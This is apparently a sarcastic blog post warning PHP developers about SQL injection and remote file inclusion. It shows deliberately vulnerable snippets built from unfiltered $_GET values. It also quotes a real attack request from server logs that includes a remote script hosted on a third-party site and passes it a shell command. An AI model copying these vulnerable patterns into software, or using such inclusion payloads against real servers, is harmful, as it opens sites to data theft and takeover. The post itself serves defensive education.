Get defacements, database dumps, remote shells, ownages and much more!

It works like that: you write dynamic code and allow parameters to be sent to your code. Then without any type of filtering or validation you use those raw values as parameters for your code.

I'll give you two examples so that you can get the result almost instantly:

Example 1: open up your database

The script would be called as news.php?id=1, which would mean "give me the news whose id equals 1"

Then in news.php you have something like

$result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id'])

This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child games!

To make sure they get the maximum benefit of their stay in your server, don't forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users' accounts since most of the people use the same password for every online service.

Example 2: open up your file system (and everything else)

You've been told about the advantages of using include files. You not only are using include() for including the header and footer, but you load each section using something like index.php?section=name_of_the_section

Then in index.php you have this:

include($_GET['section']);

Usually it would be used with values of $_GET['section'] such as 'clients.htm', 'about_us.htm', 'our_company.htm'... You name it! But what would you say if a script kiddie went creative and instead of just entering a simple filename in your server, decided to add an http:// in front of it?

Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg

Php will kindly load whatever is in that url and evaluate the contents as php code.

What, evaluate an image? You'll be surprised.

Try to open that image in your browser. Oh, image.jpg "can't be displayed by the browser because it contains errors". Really? Of course, because it's not meant to be displayed, but to be executed. In fact it is a php file which contains code for converting your innocent index.php in a complete control panel from where a cracker can install more stuff in your server, or even try to deface other websites.

So php loads it, evaluates it and suddenly there's a bunch of code ready to be executed at the cracker's will.

Isn't it brilliant, amazing, great?

... obviously not!

It's like eating food from dodgy take-aways without thinking twice. You never know what you eat!

I personally I'm bored to death of finding in the server logs request such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado

And it just shows there's still people tacitly allowing undesirable behaviour to happen in their servers, without giving a damn about that, or even worse, without knowing about that. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not in their server. Or maybe they are just a fake company.

So do us a favour: filter and validate your url parameters and stop contributing to illegal activities such as spam. Thank you very much.